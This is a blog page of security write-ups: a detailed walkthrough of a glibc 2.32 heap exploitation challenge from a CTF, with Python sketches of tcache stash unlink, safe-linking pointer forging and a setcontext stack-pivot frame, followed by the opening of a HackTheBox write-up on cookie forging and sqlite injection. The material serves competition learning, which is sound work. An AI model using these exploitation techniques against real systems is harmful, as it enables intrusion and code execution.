
Wednesday, December 30, 2020

Yet Another House ASIS Finals 2020 CTF Writeup

A few weeks ago, I played with DiceGang in ASIS Finals CTF. Yet Another House was one of the heap pwnables, and it had only one solve (which was by us). The general gist of it involved doing a glibc 2.32 poison null byte attack without a heap leak, a tcache stash unlink attack to overwrite mp_.tcache_bins, and a tcache poison for a controlled arbitrary write to escape seccomp for the flag. I didn't originally plan on making a writeup for this, but when redoing this complex pwnable a few weeks later, I thought it would be good to make some detailed notes so I don't forget these techniques.

Before I start, I would like to thank the teammates who worked with me on this: Poortho (who did the majority of the work and blooded it), NotDeGhost, Asphyxia, and noopnoop. 

Initial Work:

One thing to note immediately is the patch the author introduced into the glibc library. 


He effectively disabled the possibility of attacking global_max_fast. 

Now, reversing this binary (all protections are enabled):

Inside initialize, a 0x20 chunk is allocated and the address of the tcache_perthread_struct is recorded. According to seccomp-tools, only open, read, write, mprotect, clock_nanosleep, rt_sigreturn, brk, exit, and exit_group were allowed. Also note that this program doesn't return, only uses read() and write(), and exits with _exit, which means our seccomp escape probably will not use FSOP. 

From the allocation function, we know that our requested sizes must be greater than 0x100 and less than or equal to 0x2000. We also have 0 to 18 slots inclusive (so 19 total). The read_data function (which I didn't show) null terminates. I would say that this function overall is safe. The malloc_wrapper function performs another important task:

Seems like it wipes the tcache_perthread_struct every time you call malloc :(


The delete function is safe and nulls out the size and chunk array indices respectively.


The leak function itself is also safe. I didn't show the code for write_1 here, but it only writes the number of bytes based on strlen(data), so if we want to use this for leaks, we have to be very careful to not introduce null bytes before the leak.


And here, we have a classic CTF heap note bug... the infamous poison null byte, as it writes a null byte one past the amount read in. Note that this function can only be used once unless you reset the sanity value, but that wasn't necessary in this exploit.

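The last thing to take note of is that the unsorted bin fd and bk pointers (the usual libc leak) have a null least significant byte in this libc. Since that byte is stored first in memory, a strlen()-bounded write stops immediately, which will prove slightly troublesome later on.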
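To see why this hurts, here is a small sketch that mimics the strlen()-bounded write. It assumes a little-endian x86-64 target, and both pointer values are made up (only their lowest byte matters). A pointer whose low byte is 0x00 leaks nothing, while one with a non-zero low byte leaks its low 6 bytes.

```python
import struct

def leak_via_strlen(chunk_data: bytes) -> bytes:
    """Mimic write(fd, data, strlen(data)): output stops at the first NUL byte."""
    end = chunk_data.find(b"\x00")
    return chunk_data if end == -1 else chunk_data[:end]

# Hypothetical libc pointers; only their lowest byte matters for this demo.
UNSORTED_FD = 0x7F1234567C00   # low byte 0x00, like this libc's unsorted bin pointers
OTHER_PTR = 0x7F1234568010     # a pointer whose low byte is non-zero

# A freed chunk's user data starts with fd, then bk (little-endian qwords).
unsorted_chunk = struct.pack("<QQ", UNSORTED_FD, UNSORTED_FD)
print(leak_via_strlen(unsorted_chunk))   # b'' - nothing leaks

other_chunk = struct.pack("<Q", OTHER_PTR)
leaked = leak_via_strlen(other_chunk)    # 6 bytes, up to the zero high bytes
print(hex(int.from_bytes(leaked.ljust(8, b"\x00"), "little")))  # 0x7f1234568010
```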

Observations:

From the reversing above, we can conclude several things and propose a basic exploit path.

Fastbins can just be ignored due to the allocation size ranges and the fact that we can't change global_max_fast due to the custom patch. 

Tcachebins (or at least the original ones that are placed within the 0x280 tcache_perthread_struct) can be used, as long as you do not allocate - this is a key concept! You can also use malloc() to wipe the struct as a way to help you during your heap massage (Ex. if you want to leave a permanent chunk in between two chunks that would otherwise coalesce).

By glibc 2.32, there are many more mitigations. As documented in my Player2 writeup, glibc introduced a mitigation against poison null byte where it compares the size header with the prev_size header and ensures that they are the same before back coalescing. However, this time we cannot just easily forge some headers via a heap leak to beat the unlink check like in Player2. We will have to use the fact that glibc doesn't zero out the pointers for heap operations involving the unsorted and large bins (each uniquely sized chunk in a largebin has 2 sets of pointers, with the bottom two being fd_nextsize and bk_nextsize to help it maintain the sorted order). This technique has been documented in the following links (though some of them rely on the aid of fastbin pointers, which we do not have): BalsnCTF Plainnote writeup, poison null byte techniques, 2.29 off by null bypass (like many pwnable writeups, Chinese CTF players often document some of the coolest and most obscure techniques, but Google Translate should suffice).

An interesting thing to note is that in 2.32, the tcache_perthread_struct no longer uses uint8_t to store tcache counts; it now uses uint16_t. Hence, if we can place chunks of roughly 0x1420 bytes and up into tcache, the memset will not be able to wipe their tcache count (or their pointer). Some of you may recall that the tcache count did not matter before as long as you had a pointer in the tcache_perthread_struct (as I believe those checks were once asserts in tcache_get that got compiled out for release builds), but now there are sanity checks against such behavior. This is why we need to use a tcache bin whose count is placed outside the memset range.
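The 0x1420 figure falls out of simple arithmetic. The sketch below assumes x86-64 defaults: MINSIZE 0x20, 16-byte alignment, 64 default tcache bins, a `uint16_t counts[64]` array followed by `tcache_entry *entries[64]`, and the challenge's 0x280-byte memset. It finds the first chunk size whose count and entry pointer both lie past the wiped region. It also shows where the 0x1510 chunk used later lands.

```python
# Constants for x86-64 glibc 2.32 (64 tcache bins by default).
MINSIZE = 0x20
MALLOC_ALIGNMENT = 0x10
TCACHE_MAX_BINS = 64
COUNTS_SIZE = 2 * TCACHE_MAX_BINS                 # uint16_t counts[64]
STRUCT_SIZE = COUNTS_SIZE + 8 * TCACHE_MAX_BINS   # + tcache_entry *entries[64]
WIPE_LEN = 0x280                                  # the challenge's memset length

def csize2tidx(chunk_size):
    """glibc's csize2tidx(): tcache bin index for a chunk size."""
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT

def slot_offsets(chunk_size):
    """Offsets of counts[idx] and entries[idx] from the start of the struct.

    Indices >= 64 run past the real struct; they are only used once
    mp_.tcache_bins has been overwritten with a large value.
    """
    idx = csize2tidx(chunk_size)
    return 2 * idx, COUNTS_SIZE + 8 * idx

def survives_wipe(chunk_size):
    count_off, entry_off = slot_offsets(chunk_size)
    return count_off >= WIPE_LEN and entry_off >= WIPE_LEN

# Smallest chunk size whose count and pointer both lie past the memset.
first = next(s for s in range(MINSIZE, 0x3000, MALLOC_ALIGNMENT) if survives_wipe(s))
print(hex(STRUCT_SIZE), hex(first))                 # 0x280 0x1420
count_off, entry_off = slot_offsets(0x1510)
print(csize2tidx(0x1510), hex(count_off), hex(entry_off))  # 335 0x29e 0xaf8
```

Note that tcache only consults a bin when its index is below mp_.tcache_bins (64 by default). So these out-of-range slots only become usable after that field is overwritten.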

In order to expand the size of chunks we can place into the tcache, we can attack the malloc_par struct, with the symbol mp_ in libc. Take careful note of the tcache_bins member.

By overwriting that with a large value (such as a libc address), we can place larger chunks into tcache and bypass the wipe.

Normally, this type of write makes me think of an unsorted bin or largebin attack. However, since 2.28, the unsorted bin attack has been patched with a bck->fd != victim check, and in 2.30 the largebin attack was hardened, although how2heap still shows a potential way to perform it. I took a closer look at the newer version of this attack after the CTF; though I did not test whether it would actually work in this challenge, it could have offered a much easier alternative with a simpler setup. Another way to achieve this write in glibc 2.32 is to perform what is known as the tcache stashing unlink attack, which I learned from the following links: Heap Exploit v2.31, Tcache Stashing Unlink Attack.

The relevant source for this attack is here:

Basically, when we have chunks inside a specific smallbin, causing malloc to pull from this smallbin will afterwards trigger a transfer of the remaining chunks into the respective tcache bin. Notice the bck = tc_victim->bk and bck->fd = bin assignments during the stashing process. By corrupting the bk pointer of a smallbin chunk, we can write a libc address (the bin's own address) into a selected address + 0x10. We must take care to do this only when tcache is one spot away from being full, so the stashing procedure ends immediately afterwards and avoids any potential corruption. Most writeups first start out with 6 tcache entries filled and 2 chunks in the smallbin. You then corrupt the bk of the last one (smallbins are FIFO structures with chunks removed from the tail) and pull out one smallbin chunk (typically with calloc, which does not take from tcache). That triggers the stash process, which ends immediately because tcache becomes full. However, in this case, our tcache_perthread_struct always gets wiped, so we actually need 8 chunks in the smallbin: 1 to pull out, 6 to stash, and the final one to stash and write. Regardless of what happens, this smallbin will be corrupted and cannot be used again. If curious, readers can check out the stash unlink+ and stash unlink++ versions of this attack, which give an arbitrary address allocation, or an arbitrary address allocation plus a write of a libc address somewhere in memory.
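To make the pointer dance concrete, here is a toy Python model of the smallbin-to-tcache stash loop. It is not real glibc: chunks are objects with fd/bk links, inuse bits and tcache_put details are omitted, and the "target" is a stand-in object whose fd field plays the role of mp_.tcache_bins. The model follows the variant described here: tcache starts empty because of the memset, 8 chunks sit in the smallbin, and the bk of the chunk inserted last is corrupted.

```python
class Chunk:
    """Just the fd/bk links of a free chunk (or of a bin header)."""
    def __init__(self, name):
        self.name = name
        self.fd = self.bk = None

def smallbin_insert(bin_, c):
    # Chunks enter a smallbin at the head (bin->fd) ...
    c.fd, c.bk = bin_.fd, bin_
    bin_.fd.bk = c
    bin_.fd = c

def malloc_from_smallbin(bin_, tcache, tcache_count=7):
    # ... and leave from the tail (bin->bk), so the bin is FIFO.
    victim = bin_.bk
    bck = victim.bk
    if bck.fd is not victim:
        raise RuntimeError("malloc(): smallbin double linked list corrupted")
    bin_.bk, bck.fd = bck, bin_
    # Stash loop: tc_victim->bk is trusted without any integrity check.
    while len(tcache) < tcache_count and bin_.bk is not bin_:
        tc_victim = bin_.bk
        bck = tc_victim.bk
        bin_.bk = bck
        bck.fd = bin_          # the write: *(bk + 0x10) = &bin (a libc address)
        tcache.append(tc_victim)
    return victim

bin_ = Chunk("smallbin[0x110]")
bin_.fd = bin_.bk = bin_
chunks = [Chunk(f"c{i}") for i in range(8)]
for c in chunks:
    smallbin_insert(bin_, c)

target = Chunk("&mp_.tcache_bins - 0x10")   # its .fd stands for mp_.tcache_bins
chunks[-1].bk = target                      # corrupt bk of the chunk inserted last
tcache = []                                 # wiped by the memset, so it starts empty

got = malloc_from_smallbin(bin_, tcache)
print(got.name, len(tcache), target.fd is bin_)   # c0 7 True
```

The corrupted chunk is the seventh one stashed. Its `bck->fd = bin` store performs the write, and the loop then stops because the count has reached 7, so the bogus `bin->bk` is never followed again.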

One more new protective feature in libc 2.32 is pointer obfuscation/safe linking, which I discussed previously in my CUCTF Dr. Xorisaurus writeup, where (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer) for singly linked lists. Once we achieve a heap leak, this protection mechanism is trivial to beat, and the new aligned address check for these lists won't matter as we will be targeting __free_hook.
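Once the heap address of a freed chunk is known, forging a poisoned tcache fd is a single XOR. This is a minimal sketch: the two addresses are hypothetical placeholders, with __free_hook chosen to be 16-byte aligned, and `aligned_ok` mirrors the alignment test that 2.32's tcache_get applies to the returned entry. Note that the "address of the fd pointer" is simply the freed chunk's user pointer, because the tcache next field is the first qword of user data.

```python
PAGE_SHIFT = 12

def protect_ptr(pos, ptr):
    """glibc 2.32 PROTECT_PTR: pos is the address where the fd is stored."""
    return (pos >> PAGE_SHIFT) ^ ptr

def reveal_ptr(pos, stored):
    """REVEAL_PTR is the same XOR applied again."""
    return (pos >> PAGE_SHIFT) ^ stored

def aligned_ok(addr):
    """tcache_get() in 2.32 rejects entries that are not 16-byte aligned."""
    return addr % 0x10 == 0

# Hypothetical addresses: a freed tcache chunk's user data and __free_hook.
fd_slot = 0x55D0C0DE4A10      # where the freed chunk's fd lives
free_hook = 0x7F3A1B2C3E40    # placeholder, chosen 16-byte aligned

poisoned = protect_ptr(fd_slot, free_hook)   # value to write over the fd
print(hex(poisoned), aligned_ok(free_hook))
```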

Lastly, since this writeup requires a lot of heap massaging involving smallbins and largebins, I recommend reviewing this page from the Heap Book for all the conditions. It didn't turn out too bad when writing this exploit, as a lot of it just relied on some intuition and checking in a debugger.

Exploit Development:

I recommend closely following along with a debugger, as sometimes my explanations might be wrong, or I might have explained a small step incorrectly due to the complexity of this exploit.

To start off, I wrote some helper functions:

Our first goal is to create a massive back coalesce with the poison null byte so we can perform overlaps. This part took quite a while, but Asphyxia ended up figuring this out late at night with the following general technique using largebins, unsorted bins, and normal back coalescing.

Several chunks are allocated, and then three chunks of different sizes (but belonging to the same largebin) are freed into the unsorted bin. A chunk larger than all three is then requested. This pulls a new chunk from the wilderness and sorts the 3 unsorted chunks into the same largebin in order, with 2 sets of pointers filled in for each since they all have unique sizes. Notice how the middle-sized one has its first set of pointers at an address ending in a null byte. This is purposeful: we will later forge a fake size header over that first set of pointers. We can then perform partial overwrites on other chunks' dangling pointers with just a single null byte from the alloc function, aligning them to pass the unlink check.

Note that I didn't fill the middle chunk with as many characters, since I will soon forge a fake chunk header there as the target to back coalesce onto. Because the back coalesce region will be quite large, I have to leave the part after the pointers as null bytes (or at least the 1 qword afterwards). glibc's unlink performs additional operations when the previous chunk is of large size and has a non-null fd_nextsize pointer.

Next, Asphyxia freed the chunk before the middle largebin chunk, causing it to back coalesce (while leaving the 2 sets of pointers behind for me to use) and go into the unsorted bin. Another allocation is made so that the first set of leftover pointers can be used to fake a chunk header, and the next set of pointers can help beat the unlink checks (I chose a fake chunk size of 0x2150).

Then, we cleared out the unsorted bin and recovered the other two largebin chunks to build an unsorted chain. The order of freeing matters here for unsorted bins. We want the chunk underneath the fake headers to be in the middle, so that its address in the unsorted chain can be changed to point at the fake chunk with just a null byte overwrite (as they are all in the 0x......7XX range).

Now we want to recover the 0x440 chunk from the unsorted bin and write a single null byte there to satisfy the fd->bk == P check. We want to do the same thing on the 0x460 chunk; to preserve its pointers, we back coalesce it with a chunk before it. Then, an allocation can place a null byte that changes the 0x720 ending into a 0x700 ending, and the unlink check will be satisfied. Later on, when I trigger the malicious back coalesce, I will also get some heap pointers into these two chunks for a heap leak, due to how unlink works. Notice how the forged chunk has the perfect pointer chain setup to pass the unlink check.
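The conditions the fake chunk must satisfy can be written down as a small model of the checks in glibc 2.32's unlink_chunk(). This is only a sketch. Memory is a sparse qword dictionary, and every address is hypothetical. A and B stand in for the writeup's 0x440 and 0x460 unsorted chunks, and their dangling pointers initially point 0x20 past the fake header. The model shows the fake 0x2150 chunk failing the fd->bk/bk->fd check until a single null byte is written over the low byte of each dangling pointer. It also shows why the qword after the fake fd/bk (fd_nextsize) must stay NULL for such a large size.

```python
MIN_LARGE_SIZE = 0x400    # on x86-64, sizes below this are "in smallbin range"

class Memory:
    """Sparse qword-addressed memory; unset qwords read as 0."""
    def __init__(self):
        self.q = {}
    def __getitem__(self, addr):
        return self.q.get(addr, 0)
    def __setitem__(self, addr, val):
        self.q[addr] = val & 0xFFFFFFFFFFFFFFFF

def unlink_chunk_checks(mem, p):
    """Checks glibc 2.32's unlink_chunk() applies to the chunk whose header is at p."""
    size = mem[p + 0x8] & ~0x7
    if mem[p + size] != size:                        # prev_size of next chunk
        return "corrupted size vs. prev_size"
    fd, bk = mem[p + 0x10], mem[p + 0x18]
    if mem[fd + 0x18] != p or mem[bk + 0x10] != p:   # fd->bk == p && bk->fd == p
        return "corrupted double-linked list"
    if size >= MIN_LARGE_SIZE and mem[p + 0x20] != 0:
        fdn, bkn = mem[p + 0x20], mem[p + 0x28]
        if mem[fdn + 0x28] != p or mem[bkn + 0x20] != p:
            return "corrupted double-linked list (not small)"
    return "ok"

mem = Memory()
FAKE = 0x55555555B700                   # hypothetical fake chunk on a ...700 address
FAKE_SIZE = 0x2150                      # fake size used in the writeup
A, B = 0x55555555A290, 0x55555555D9C0   # hypothetical chunks with leftover pointers

mem[FAKE + 0x8] = FAKE_SIZE | 1          # fake size header (PREV_INUSE set)
mem[FAKE + 0x10], mem[FAKE + 0x18] = A, B
mem[FAKE + 0x20] = 0                     # fd_nextsize must stay NULL
mem[FAKE + FAKE_SIZE] = FAKE_SIZE        # prev_size placed before the poison null byte

mem[A + 0x18] = FAKE + 0x20              # dangling pointers end in ...720
mem[B + 0x10] = FAKE + 0x20
print(unlink_chunk_checks(mem, FAKE))    # corrupted double-linked list

mem[A + 0x18] &= ~0xFF                   # single null byte over the low byte: ...700
mem[B + 0x10] &= ~0xFF
print(unlink_chunk_checks(mem, FAKE))    # ok
```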

Afterwards, I cleaned up the remaining largebin and unsorted bin, and performed a few more allocations just to expand the number of chunks that would be overlapped. I then allocated a few more chunks of 0x110 size (which I will use later for the tcache stash unlink attack). These came with some additional fake chunk metadata so that I can later free a fake 0x1510 chunk, which I plan to use for the tcache poison attack. The final 0x110 chunk I allocated is just meant to prevent consolidation later, depending on the order in which I build my smallbin chain. I cannot use it for anything else, as this extra spot is crucial for the later massage.

I triggered the poison null byte after setting the correct prev_size metadata and created a massive unsorted bin that overlapped a lot of memory after I freed the poisoned chunk.

Now chunk 3 will have heap pointers. Chunk 5 also does, but my forged size metadata comes before it so you won't be able to leak it from there.

Here, some serious heap massaging begins. During the CTF, Poortho managed to massage it cleanly in 2-3 hours (basically carrying us to the first blood); I remember his exploit having several dangling unsorted and small chains around so it is quite impressive that he managed to keep the heap stable. It took me much longer to massage the heap, and I had to keep it as clean as possible to avoid breaking it.

Since the libc address for unsorted bins starts with a null byte in memory, I had to find a way to get a largebin pointer allocated into the beginning of my chunk data for a libc leak. I achieved this by first aligning the unsorted bin with one of my chunk data addresses, then allocating a very large chunk (larger than the unsorted chunk) to trigger largebin activity, which provided me with a libc leak. I also performed two operations to fix some chunk size metadata that got corrupted and overwritten during these heap manipulations. They turned out to be unnecessary, since I had to change all of them in the next stage of the exploit. Lastly, I allocated another 0x110 chunk into index 10 and used that as an opportunity to fix index 8's chunk size to something valid that works nicely with free().

A general technique I used above and one that I will use from now on to fake sizes or forge metadata is one where I allocate one to two massive chunks from the unsorted bin to reach the specified destination, write the data upon allocation, and then free it in the opposite order of allocation to back coalesce it and restore the state of the unsorted bin.

In order to perform a tcache stash attack in a scenario where the tcache_perthread_struct gets wiped on each malloc(), we need 15 0x110 chunks to free. The first 7 can be freed into tcache, and the next 8 will be freed into the unsorted bin (where we have to be very careful to avoid chunk coalescing). From there, we can trigger malloc to move all of them into the smallbin. The chunk inserted into the 0x110 smallbin last must be overlapped so its bk pointer can be tampered with. This way we can still perform the stash attack without crashing, and have the final chunk entering tcache perform the write. At the current stage, we only have 0x110 chunks in 12, 13, 14, 15, 16, 17, 2, 4, 7, and 10, so we will need 5 more. Here is the program chunk array as of now:

The ones marked with X are the 0x110 chunks (or at least should have that as the size and I have to repair them later). The ones marked with S are towards the end of the unsorted overlap, and hence I would like to save them for the overlap writes later. I plan on saving one for the tcache poison, one for the smallbin bk pointer corruption, and just one extra for backup/padding purposes (in the end, I didn't even need it); these were index 1, 6, and 9. 

To free up the other chunks, I applied the technique mentioned above (allocate one to two chunks, write the correct size or just spam 0x21 sizes, and recoalesce to restore the unsorted chunk) in several places:

- on chunks 3 and 5 to make them isolated 0x20 sized chunks (the size for index 8 had already been changed in the last 0x110 allocation);
- on chunk 9 to make it size 0x1510;
- one last time to fix some of the 0x110 chunk size metadata that I may have overwritten.

Chunk 11 can be freed before all of these operations by just having it back coalesce into the large unsorted chunk. I also freed 0, which added one more chunk to the unsorted bin, but luckily it didn't raise any new issues in the later heap massage. We should have 6 free spots at this point: 5 for additional 0x110 chunks and one for padding/alignment purposes to create an overlap.

Now, I added 5 more 0x110 chunks. This could not be done directly. Instead, I arranged the allocations (and some frees) so that the unsorted chunk created from freeing chunk 0 runs out after 3 0x110 chunk allocations. Then I allocated another 0x110 chunk, allocated a large chunk that extended into index 6's chunk data (which we control), and allocated a 0x110 chunk from there (giving us an overlap over a potential smallbin chunk). Since this last chunk will go into the unsorted bin before the smallbin, I had to ensure that it would not coalesce with the neighboring unsorted chunk. So I freed a previous 0x110 chunk and allocated one more from unsorted to act as a guard chunk. The nice thing about the tcache memset is that I can free smaller chunks like these to help with the heap massage without worrying about them coming back.

One thing to note is why I chose index 6 as the chunk to overlap and overwrite the last smallbin bk. I mentioned it above in the code comments: there was a 0x110 chunk after it, and it was also the first of the three chunks I kept in memory.

At this stage, we have 15 chunks of 0x110 size: index 0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18. To avoid any coalescing and keep this number of chunks for the tcache and smallbin frees, I closely considered the following rules (which you can see from debugging):

1. 12 to 17 is a chain (17 won't coalesce into top even if it is treated as unsorted due to a guard chunk placed below early on)

2. 12 will back coalesce into the large unsorted if not entered into tcache.

3. 0, 3 is a chain

4. 8, 10 is a chain

5. 5 is on top of the big unsorted chunk

6. 2, 4 are isolated

7. 7 has the potential to go into unsorted and merge with a smallbin

8. 18 must be the last one into the smallbin

Following these observations, I performed the following free chain: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18. I then made a larger allocation to trigger the transfer to smallbin of the 8 unsorted 0x110 chunks and freed this larger chunk to restore the large unsorted bin's state.
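The free order can be sanity-checked against the rules above with a few lines of bookkeeping. This is a sketch under one stated assumption: each "chain" lists physically adjacent chunks in address order (for example, 12 to 17 sit back to back). The script confirms that the 7 tcache frees include 12, 5, and 7. It also checks that 18 goes into the smallbin last and that no two neighbours in a chain both land in the unsorted bin, where they would coalesce.

```python
# Free order from the writeup: the first 7 fill tcache, the last 8 go to unsorted.
FREE_ORDER = [14, 16, 3, 10, 5, 12, 7, 17, 2, 13, 15, 0, 8, 4, 18]
X110 = {0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18}

# Assumption: each chain lists physically adjacent chunks in address order.
CHAINS = [[12, 13, 14, 15, 16, 17], [0, 3], [8, 10]]
MUST_BE_TCACHE = {12, 5, 7}   # rules 2, 5 and 7: these would coalesce or merge

def check_free_order(order):
    assert sorted(order) == sorted(X110), "each 0x110 chunk freed exactly once"
    tcache, unsorted = set(order[:7]), order[7:]
    assert MUST_BE_TCACHE <= tcache, "12, 5 and 7 must go into tcache"
    assert unsorted[-1] == 18, "18 must be the last chunk into the smallbin"
    for chain in CHAINS:
        for a, b in zip(chain, chain[1:]):
            # two neighbours both in unsorted would coalesce into one chunk
            assert not (a in unsorted and b in unsorted), (a, b)
    return tcache, unsorted

tcache, unsorted = check_free_order(FREE_ORDER)
print(sorted(tcache), unsorted)   # [3, 5, 7, 10, 12, 14, 16] [17, 2, 13, 15, 0, 8, 4, 18]
```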

Note that pwndbg labels the doubly linked bins as corrupted whenever I go over 4-5 chunks in them, but in reality, they are fine.

Since the edit function has already been used up, I had to free index 6 into the unsorted bin and then allocate it back to overwrite the index 18 0x110 smallbin chunk, setting its bk so that the stash writes a libc address into mp_.tcache_bins. Making another request from the smallbin should trigger the stash. The 0x110 smallbin is also corrupted afterwards, so you should avoid allocating from it.

Between index 1 and 9, I chose to use 9 for my tcache poison. To set this up, I first allocated a large enough chunk to make the unsorted bin small enough so that when I ask for a 0x1510 allocation, it pulls from wilderness. I then freed this new chunk, and then index 9 (which had its size overwritten with 0x1510). Due to the new mp_.tcache_bins value, a tcache chain is created here that is not reached by the 0x280 byte memset hooked onto malloc.

Then, I pulled a chunk from the large unsorted chunk to overlap what was index 9, and, following the pointer obfuscation rules, changed its fd to __free_hook.

Now, we must decide how to escape the seccomp filter. Of course, we will need an open/read/write ROP chain; however, how can we pivot with only control over __free_hook (which implies we have control over rdi)?

One idea that we had was setcontext, which is a well known function to use as a stack pivot.

However, starting around libc-2.29 (?) it relied on rdx instead of rdi, and we do not have control over rdx. After some attempts at FSOP and forcing in a format string attack, Poortho and I discovered an extremely powerful COP gadget (which exists in many (newer?) glibc versions) that allows us to control rdx from rdi and call an address relative to rdx. In this libc, it was the following:

mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];

This makes it relatively trivial, as we can just set up the heap for the ROP (taking care of the one push rcx instruction setcontext performs). I went for an mprotect to change the heap to rwx, and then pivoted to shellcode on the heap to open, read, write, and exit. Due to my earlier spamming of 0x21 metadata, I was not able to allocate again from some of the larger chunks, but I had enough left in the unsorted bin to pull smaller chunks out. Here is the final bit of my exploit:
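For readers reconstructing this step, here is a sketch of the heap frame layout. It is not the author's script. It uses the standard x86-64 ucontext_t slots that setcontext reads relative to rdx (rdi at 0x68, rsi at 0x70, rdx at 0x88, rsp at 0xa0, rip at 0xa8). All addresses, including the setcontext gadget entry point, are hypothetical placeholders. The flow works like this: __free_hook points at the COP gadget, so free(chunk) gives rdi = chunk. The gadget loads rdx = [rdi + 8], which here points back at the same chunk, and then calls [rdx + 0x20], the setcontext gadget. setcontext pivots rsp onto a fake stack inside the chunk and pushes rip, so its ret enters mprotect, which in turn returns into the shellcode.

```python
import struct

# ucontext_t slots that setcontext reads on x86-64 (offsets from rdx).
UC_RDI, UC_RSI, UC_RDX = 0x68, 0x70, 0x88
UC_RSP, UC_RIP = 0xA0, 0xA8    # rip is loaded into rcx and pushed onto the new stack
COP_CALL_SLOT = 0x20           # "call qword ptr [rdx + 0x20]" in the COP gadget
STACK_OFF = 0xB0               # fake stack placed right after the context fields
PROT_RWX = 7                   # PROT_READ | PROT_WRITE | PROT_EXEC

def build_frame(frame_addr, setcontext_gadget, mprotect, shellcode, rwx_len=0x2000):
    """Bytes to write at frame_addr, the chunk whose free() reaches __free_hook.

    Every address is a caller-supplied placeholder, not a value from the real exploit.
    """
    frame = bytearray(STACK_OFF + 8)

    def put(off, val):
        struct.pack_into("<Q", frame, off, val)

    put(0x08, frame_addr)                  # COP gadget: rdx = [rdi + 8] -> this chunk
    put(COP_CALL_SLOT, setcontext_gadget)  # COP gadget: call [rdx + 0x20]
    put(UC_RDI, frame_addr & ~0xFFF)       # mprotect arg 1: page-aligned heap address
    put(UC_RSI, rwx_len)                   # mprotect arg 2: length
    put(UC_RDX, PROT_RWX)                  # mprotect arg 3: rwx
    put(UC_RSP, frame_addr + STACK_OFF)    # stack pivot target
    put(UC_RIP, mprotect)                  # pushed to [new rsp - 8]; setcontext's ret enters it
    put(STACK_OFF, shellcode)              # mprotect then returns into the shellcode
    return bytes(frame)

frame_addr = 0x55D0C0DE52A0                # hypothetical heap address
frame = build_frame(frame_addr, setcontext_gadget=0x7F3A1B0551DD,
                    mprotect=0x7F3A1B11BA80, shellcode=frame_addr + 0x100)
```

Placing the fake stack at offset 0xb0 means the single push rcx lands exactly on the rip slot at 0xa8. That value has already been read, so the push clobbers nothing else in the frame.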

Final Exploit:

Do note that in this writeup, I nop'd out the sleep for the sake of local testing. However, I also ran it against the provided ynetd binary (as the CTF server is no longer up), with my script adding a 3 second timeout for each option. It still finished more than 10 minutes under the sigalarm limit, so it should have been fine in the actual competition.

Concluding thoughts:

While this challenge was overall pretty decent, as it showed some up to date glibc tricks, I felt that some of the elements were unnecessary and added artificial difficulty. This challenge could have been just as difficult conceptually if it had allowed 2-3 more allocation spots, rather than forcing players who have the correct plan to rewrite their exploit several times. Combining a sigalarm with a 2 second sleep in the main menu also didn't add any value. Additionally, while the custom patch made in this libc makes sense and did contribute to overall quality, I do see libc patching happening more often, and I hope CTF authors do not abuse it to create extremely contrived heap note problems.

Feel free to let me know if I made any mistakes in my explanations (as this problem was quite complex), congrats to Poortho for taking first blood, and thanks again to all those teammates that worked with me in DiceGang, which placed 4th overall!

Saturday, November 14, 2020

Intense HacktheBox Writeup

 

Intense was a hard box involving some web exploitation techniques such as sqlite injection and a hash length extension attack, snmp exploitation, and an easy pwnable for root. Overall, I thought sokafr did a great job with this box.

To begin, our initial port scan revealed the following ports from masscan:

22/tcp  open   ssh     syn-ack ttl 63

80/tcp  open   http    syn-ack ttl 63

161/tcp closed snmp    reset ttl 63

Opening up port 80, we see the following:


It provides us with guest:guest as credentials, as well as a link to the zipped source code, which we can download. Inside, you can find some templates and other misc. info, but the most important files are the 4 python files of this flask app (which uses a sqlite database): utils.py, lwt.py, app.py, and admin.py.

Some important takeaways from this include the following observations:

The user information from here is stored in the sqlite database, based on the data for username and secret (which is the sha256 hash of your input for password). The usage of query_db() and its behavior makes it safe from sqli at this login point.

The session is built and checked in the following functions:

To summarize, the session lives in an “auth” cookie made of 2 base64 portions separated by a period. The first portion is based on the return value of try_login(), which is a dictionary of username and secret. Using this dictionary, it formats the session as username=username;secret=hash;. The second portion is a signature over that data: the digest of sha256(SECRET + data), where SECRET is a random bytestring with a random length between 8 and 15. Both the data and this signature are base64 encoded and returned as the value of the “auth” cookie. Many subsequent operations call get_session(), which calls parse_session(), which first verifies the data against the signature. Interestingly enough, if you find a way to bypass this verification, the way parse_session() behaves would let you append data that replaces keys already set earlier in the loop.
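As a rough model of that description, here is a hypothetical reconstruction. It is not the application's actual code. The field names, the ";"/"=" splitting, and the last-key-wins dictionary are assumptions chosen to match the behaviour described above. The point is that any correctly signed blob ending in `username=admin;...` parses as admin.

```python
import base64
import hashlib
import os

# Hypothetical reconstruction of the session format described above.
SECRET = os.urandom(8 + os.urandom(1)[0] % 8)   # random bytes, length in [8, 15]

def sign(data: bytes) -> bytes:
    # Secret-prefix MAC: sha256(SECRET + data)
    return hashlib.sha256(SECRET + data).digest()

def make_cookie(username: str, secret_hash: str) -> str:
    data = f"username={username};secret={secret_hash};".encode()
    return (base64.b64encode(data) + b"." + base64.b64encode(sign(data))).decode()

def parse_session(cookie: str) -> dict:
    data_b64, sig_b64 = cookie.split(".")
    data, sig = base64.b64decode(data_b64), base64.b64decode(sig_b64)
    if sign(data) != sig:
        raise ValueError("bad signature")
    session = {}
    for field in data.split(b";"):
        if b"=" in field:
            key, value = field.split(b"=", 1)
            session[key] = value      # a repeated key overwrites the earlier value
    return session

cookie = make_cookie("guest", hashlib.sha256(b"guest").hexdigest())
print(parse_session(cookie)[b"username"])   # b'guest'
```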

Becoming admin lets you interact with some interesting functionality:

There's a ridiculously obvious lfi here. Now, would there be any endpoints that would allow us to extract data to become admin?

Let's take a look at a feature the guest user has access to, the submitmessage() function:

You're restricted to a 140 byte message, and there are some blacklisted words. However, query_db isn't even really used “correctly” here, as the application directly formats your input into the query, leading to an obvious sqlite injection. One thing to note is that it doesn't show you the result besides success or failure, so this is a clear case for an error based injection. I used load_extension when the comparison in my error brute force is false; this returns an authorization error (plus the extension doesn't even exist). My teammate Bianca had another interesting way to error brute this, passing bad inputs to json_extract when the comparison fails to trigger an error.

Messing around briefly in db-fiddle, I will be basing my script off the following sqli template:

